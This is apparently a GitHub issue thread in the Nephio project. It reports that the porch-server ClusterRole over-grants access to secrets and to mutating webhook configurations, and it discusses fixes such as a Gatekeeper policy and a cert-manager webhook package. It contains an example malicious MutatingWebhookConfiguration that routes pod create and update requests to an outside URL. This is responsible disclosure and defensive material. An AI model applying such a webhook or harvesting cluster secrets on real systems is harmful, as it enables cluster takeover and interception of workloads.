nephio-project/nephio

A potential risk of porch which can be leverage to make cluster-level privilege escalation

Opened this issue · 5 comments

Submitted on behalf of Nanzi Yang, a PostDoc of UMN
Ref: https://lists.nephio.org/g/sig-security/message/107

Detailed analysis:
The porch has a deployment called porch-server, which is bound with a ClusterRole called aggregated-apiserver-clusterrole. This ClusterRole has get/list verb of secrets resources, and has create/patch/update verb of mutatingwebhookconfigurations resources. If a malicious user can access the worker node which has this component, he/she can:

For the get/list verb of secret resources, he/she can abuse it to retrieve and get ALL secrets in the whole cluster(e.g., the cluster-admin secret if created). Thus, the attacker can abuse these high-privilege token to take over the whole cluster.

As for the create/patch/update verb of mutatingwebhookconfiguration resource. The malicious user can abuse these permission to create a webhook like this:
apiVersion: admissionregistration.k8s.io/v1
kind: MutatingWebhookConfiguration
metadata:
name: metallb-webhook-configuration
webhooks:

  • name: example.webhook.com
    clientConfig:
    url: "https://8.8.8.8/"
    caBundle: "dGhpcyBpcyBhIGV4YW1wbGU="
    rules:
    • operations: ["CREATE", "UPDATE"]
      apiGroups: [""]
      apiVersions: ["v1"]
      resources: ["pods"]
      admissionReviewVersions: ["v1", "v1beta1"]
      sideEffects: None
      timeoutSeconds: 5
      admissionReviewVersions: ["v1", "v1beta1"]
      matchPolicy: Equivalent
      After that, the malicious user can create its own webhook server to intercept and modify any Kubernetes resources (e.g., the Create and Update verb of pods resources) in the whole cluster, and resulting in a SSRF attack.

Mitigation discussion:

  1. For the secret-related permissions, you can try to use accurate resource name to restrain the Secret resources can be accessed by the deployment, or you can try to use RoleBinding instead of ClusterRoleBinding to illuminate the cluster-level effects. Or you can just remove these excessive permission if it doesn't needed by its normal functionalities.

  2. For the permissions related to mutatingwebhookconfiguration resource, it can also modify the source code and do not user mutatingwebhookconfiguration related permissions. However, it needs a careful review of the source code without disrupting its normal functionalities. Besides, as far as I am concerned, you can mitigate the risk via a firewall / certain config changes as mentioned in the issue(kubernetes/kubernetes#104720). Maybe you can also try to use a separate Kubernetes namespace with RoleBinding instead of ClusterRoleBinding to illimitate the cluster-level effects.

A few questions:

  1. Is it a real issue?
  2. If it's a real issue, can porch fix these problems following my suggestions?
  3. If it's a real issue, can porch give me a CVE number for awarding my efforts?

By the way, I tried to send this message to John Belamaric(jbelamaric@...). He said that it sound like over-granting of unnecessary privileges, and he suggested that I send this to SIG security of him and Fiachra(https://github.com/nephio-project/nephio/blob/main/SECURITY.md#please-use-the-process-below-to-report-a-vulnerability-to-the-project). I just followed his suggestion and tried to send this message to make a further discussion:)
Looking forward to your reply.
Regards,
Nanzi Yang

In many cases, there is a practical reason to provide Create/Update permissions for mutatingwebhooks. In this case, the MutatingWebhookConfiguration handling is needed for porch for rotating it’s certificate for TLS comms between kube-apiserver and porch-server. However, the general sense in the team is that we might have over provisioned access for other resources/verbs. We need to do a periodic assessment about excessive permissions issued to any serviceaccounts/users/resources in Nephio cluster along with the development team. Will keep you posted on the same. Many thanks for bringing this to our notice.

Will bring this up in the SIG-Automation and SIG-Security groups next week.

@nyrahul @adetalhouet
Dear porch maintainers:
I am Nanzi Yang, the reporter of this potential vulnerability. I understand that the proch do need the MutatingWebhookConfuguration related permission. As far as I am concerned, perhaps you can use Gatekeeper or OPA to restrict the resources that a MutatingWebhookConfiguration can listen to and modify.

Here's a basic example using Gatekeeper:
ConstraintTemplate

apiVersion: templates.gatekeeper.sh/v1beta1
kind: ConstraintTemplate
metadata:
  name: mutatingwebhookrestriction
spec:
  crd:
    spec:
      names:
        kind: MutatingWebhookRestriction
  targets:
    - target: admission.k8s.gatekeeper.sh
      rego: |
        package mutatingwebhookrestriction

        deny[msg] {
          input.review.kind.kind == "MutatingWebhookConfiguration"
          webhook := input.review.object.webhooks[_]
          resource := webhook.rules[_].resources[_]
          not allowed_resource(resource)

          msg := sprintf("MutatingWebhookConfiguration cannot operate on resource: %v", [resource])
        }

        allowed_resource(resource) {
          resource == "pods"
        }

*** Constraint***

apiVersion: constraints.gatekeeper.sh/v1beta1
kind: MutatingWebhookRestriction
metadata:
  name: restrict-mutating-webhook
spec:
  match:
    kinds:
      - apiGroups: [""]
        kinds: ["MutatingWebhookConfiguration"]

The ConstraintTemplate defines a new constraint template MutatingWebhookRestriction with Rego logic to check resources in the MutatingWebhookConfiguration. The Constraint Applies this template to match all MutatingWebhookConfiguration resources.

This setup allows you to restrict users from creating MutatingWebhookConfiguration that operates on certain resources, for example, only allowing operations on pods. You can adjust the Rego logic to fit your specific requirements.

The example provided is just a starting point. The core idea is to use OPA or Gatekeeper to restrict which resources a MutatingWebhookConfiguration can listen to and modify. You can extend this approach based on your specific needs.

Looking forward to your reply.
Regards,
Nanzi Yang

@nyrahul Maybe one solution would be to promote https://github.com/nephio-project/catalog/tree/main/nephio/optional/porch-cert-manager-webhook package as the porch package that's integrated with Nephio, as it externalises the cert handling to cert-manager, removing the need for the role allowing porch to do the modifications to the mutatingWebhook. Cert-manager is already part of nephio because CAPI has a hard dependency on it.

In general, SIG-Security is working towards Workload Identity mechanism to be adopted across all workloads in Nephio Management/Workload clusters. You will see some updates in the context very soon.